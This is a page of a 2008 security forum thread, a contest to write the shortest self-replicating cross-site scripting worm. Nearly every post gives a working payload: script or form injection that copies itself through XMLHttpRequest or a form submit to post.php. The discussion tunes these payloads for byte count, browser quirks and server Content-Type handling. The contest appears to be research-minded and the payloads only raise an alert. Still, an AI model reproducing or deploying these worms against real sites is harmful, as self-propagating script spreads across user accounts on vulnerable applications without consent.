Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011...LastNext
Current Page: 6 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: dev80
Date: January 05, 2008 12:54PM

@sirdarckcat: I'm not sure what you mean by missing the payload. Its on this line populated mostly by the valueOf method:

x.send("content=<script>" + p.valueOf() + "p()<\/script>");

And what do you mean by server header dependent?

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 01:03PM

dev80
read the last rule of the contest..
8) must have a payload of "XSS" in an alert box

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: dev80
Date: January 05, 2008 01:08PM

OOOH!, duh, sorry about that. 159 bytes

<script>function p() {
alert("xss");
x=new XMLHttpRequest;
x.open("post","post.php");
x.send("content=<script>" + p.valueOf() + "p()<\/script>");
}p()</script>

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 05, 2008 01:11PM

Just not to post the obvious,
<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">

161!
<form id=_><input name="content"><script>with(_)alert('XSS',submit(content.value='<form id=_>'+innerHTML.slice(action=(method='post')+'.php',147)))</script>

156!


And OK, the obvious:
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>


Goodbye (I MUST work!) :(

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 01/05/2008 01:19PM by ma1.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 01:20PM

<form><input name="content"><script>with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),146))</script>

155 yay

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 01:31PM

capitalized for ie:
<form><INPUT name="content"><SCRIPT>with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),149))</SCRIPT>

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 01:42PM

ah wait mine doesnt work :(

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: amado
Date: January 05, 2008 02:26PM

<script>(function w(){alert("xss");n=new XMLHttpRequest;n.open("post","post.php");n.send("content=<script>("+w+"())<\/script>")}())</script>

140!! :D

http://triviasecurity.net/ ;For all your security needs

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 02:33PM

Quote
dev80
function p(){alert("xss");x=new XMLHttpRequest;x.open("post","post.php");x.send("content="+p.valueOf()+"p()<\/script>");}p()
I guess you read my post and stripped + bloated some stuff .. I thought you had something new with the valueOf, instead of toString, but it works the same. On FF you still have the bloat problem (see post), and the \/ get's evaluated to / on FF so you're worm fails on the second runtime. Next to that you're not encoding it right ...

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: dev80
Date: January 05, 2008 02:42PM

@bwb labs, still trying to figure out what you meant by the first part of your statement, but I think amado might have cut it down... also...

what do you mean by not encoding it right? For most web applications, that part is optional as they'll deal with incoming content whether or not its properly URL encoded.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 02:45PM

I just tested this..

without content-type the XHR is useless, sorry

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: dev80
Date: January 05, 2008 02:49PM

do you mean data won't be sent or parsed by post.php or something else?

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 02:50PM

wont be parsed by Apache

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 03:03PM

Quote
dev80
still trying to figure out what you meant by the first part of your statement
just ''+p is equal to p.toString() or p.valueOf().
Quote
dev80
what do you mean by not encoding it right?
content=function p(){alert("xss");x=new... I guess x will be defined instead of all data to content. If the app will just handle all data (in stdin or whatever), content= wouldn't be needed either.
Quote
dev80
do you mean data won't be sent or parsed
I was only testing the sending, that is done (without header).

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 03:11PM

Quote
amado
<script>(function w(){alert("xss");n=new XMLHttpRequest;n.open("post","post.php");n.send("content=<script>("+w+"())<\/script>")}())</script>
You've solved one of the crappy problems, great! (namely "cannot reference to f in f: f=function(){reference to f}();")
So that strips 2 bytes of my solution :-).

To summarize:
old failing: <script>w=function(){alert(w)}()</script>
amado trick: <script>(function w(){alert(w);}())</script>
old sol:<script>w=function(){send('w='+w+';w()')};w()</script>
new sol:<script>(function w(){send('('+w+'())')}())</script>
Saving two bytes!!!

I'm sticking to the fact that you still have to do it my way (encoding wise) and still have the FF bloat problems:
<script>(function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>("+f+"())</sc"+"ript>"));}())</script>
166 bytes

Crap:
- dubious function.toString() :-)
- bloat (space/tab/newline) in source!!! (and ' get's converted to ", and an extra ; is added)
- still: encodeURIComponent() only method that seems to do the job right (escape & encodeURI won't)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 03:17PM

Quote
ma1
And OK, the obvious:
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>

Goodbye (I MUST work!) :(

I surrender to my master, I cant think on anyway of making this code shorter..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/05/2008 03:18PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: amado
Date: January 05, 2008 03:23PM

bwb labs, u dont need that last semicolon at the end of the function after send(..), thatll save u one byte ;)

but like sirdarckcat mention, it wont work in apache.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: shawn
Date: January 05, 2008 03:35PM

@ma1

That last one can three bytes shorter.

From:

<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>

To:

<form id=_><input name=content id=c><script>with(_)submit(action=(method='post')+'.php',c.value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>

At least, I THINK that'll still work...works in Firefox, no IE handy to test.

*Edited to change "147" to "146" in the modified one.



Edited 1 time(s). Last edit at 01/05/2008 03:37PM by shawn.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 03:38PM

Quote
amado
u dont need that last semicolon at the end of the function after send(..), thatll save u one byte ;)
but like sirdarckcat mention, it wont work in apache.
I know, the last semicolon is added by the FF toString, so that's why I left it there.
About the "Content-Type: application/www-form-urlencoded" problem, I've just tested on IIS6/ASP.NET, it is required there too.
Quote
rsnake
7) must work in at least Internet Explorer 7.0 and Firefox 2.x
rsnake didn't give server architecture specs, we can assume PHP as parsing language, but still it is the webserver software who does the CGI form value parsing (I think), there might be an exotic webserver who'll work without the Content-Type (or I can build it myself ;-).

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Alex
Date: January 05, 2008 03:45PM

@shawn: But this is against the rules. The stripped quotes will be inserted again.

---
~~Patching is for suckers~~

http://www.bitsploit.de



Edited 1 time(s). Last edit at 01/05/2008 03:46PM by Alex.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 03:46PM

Quote
shawn
<form id=_><input name=content id=c><script>with(_)submit(action=(method='post')+'.php',c.value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>
that doesnt work on replication.

Quote
bwb labs
(or I can build it myself ;-)
hahaha your code will work fine on my webserver.. (I made one.. Azteca WebServer), I'll give you that.. but rsnake still has to decide that.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 03:48PM

<form method=POST action=post.php><INPUT NAME=content onFocus=content.value=document.body.innerHTML;alert('xss');submit()>

122

The 2nd version becomes:
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

137



Edited 2 time(s). Last edit at 01/05/2008 03:50PM by Spyware.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 03:52PM

just in case XHR without content-type is valid, they can still be reduced:
<script>function w(){alert("xss");(n=new XMLHttpRequest).open("post","post.php");n.send("content=<script>("+w+"())</"+"script>")}w()</script>
141
<script>function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>"+f+"f()</"+"script>"));}f()</script>
164

Quote
Spyware
<form method=POST action=post.php><INPUT NAME=content onFocus=content.value=document.body.innerHTML;alert('xss');submit()>

122

The 2nd version becomes:
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

137

-Spyware
check the rules, it shouldnt grow.. you have to do something like..
ÿ<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML.match(/ÿ.*/);alert('xss');submit()"></form>
but I dont know if that's valid or if it'll work.. you need a linebreak at the end.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 4 time(s). Last edit at 01/05/2008 04:03PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 03:58PM

To all you who slice/substr: if the content field is truncated, it doesn't matter if a </form> field will be added to the field, since the truncation will remove it then. If it will be completely rejected if it get's to long, a slice/substr will be needed of course (since it'll be shorter than duplicating a closing form tag). It all depends on rsnake to clarify some rules here again :-).

To all <form id=whatever> posters, I get Error: whatever is not defined in FF2, should the HTML page comply to some quicksmode/doctype thing?

Quote
sirdarckcat
hahaha your code will work fine on my webserver.. (I made one.. Azteca WebServer), I'll give you that.. but rsnake still has to decide that.
Cool :-), yeah, we do need a clarification for it...

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 04:02PM

bwb labs:
well, the reason I have 2 first/second places on the list is because it depends on rsnake if it's valid or not, if it's not, then the not-bold scores will apply.

and in the slice/substr:

this is longer:
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php', content.value='<form id=z>'+innerHTML+'</form>'))</SCRIPT></form>

than this:
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php', content.value='<form id=z>'+innerHTML.slice(0,148)))</SCRIPT>

or what do you mean?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 04:03PM

@Sirdarckcat

The growth was caused by Firefox adding stuff to make it a little bit compliant. If it cannot grow, I'll submit the second version.

<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

137, doesn't grow ;)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 04:04PM

@Spyware it still grows:
<body>
blahblahblah
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

will submit:

blahblahblah
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

maybe something like this:
<b><form method="post" action="post.php"><input name="content" onfocus="submit(value=parentNode.parentNode.innerHTML.bold(),alert('xss'))"></form></b>

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 04:07PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 04:06PM

Oh man, I need some sleep. Of course it grows, thanks for pointing that out, again. Let me work on it some more.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: shawn
Date: January 05, 2008 04:10PM

Alex Wrote:
-------------------------------------------------------
> @shawn: But this is against the rules. The
> stripped quotes will be inserted again.

Gah...never mind that one, then. Managed to make it longer without realizing it.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 04:13PM

Quote
sirdarckcat
<script>function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>"+f+"f()</"+"script>"));}f()</script>
You're right! That saves another 2 bytes, but the FF bloat problem stays, so this is still the shortest XMLHttpRequest worm (without Content-Type) till now:
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>
Another note about webserver software and Content-Type, there are some big sites that are running their own webserver software/proxies/strange loadbalancers, so I think the likelihood that the Content-Type is not required there is higher.

Options: ReplyQuote
Pages: Previous1234567891011...LastNext
Current Page: 6 of 20


Sorry, only registered users may post in this forum.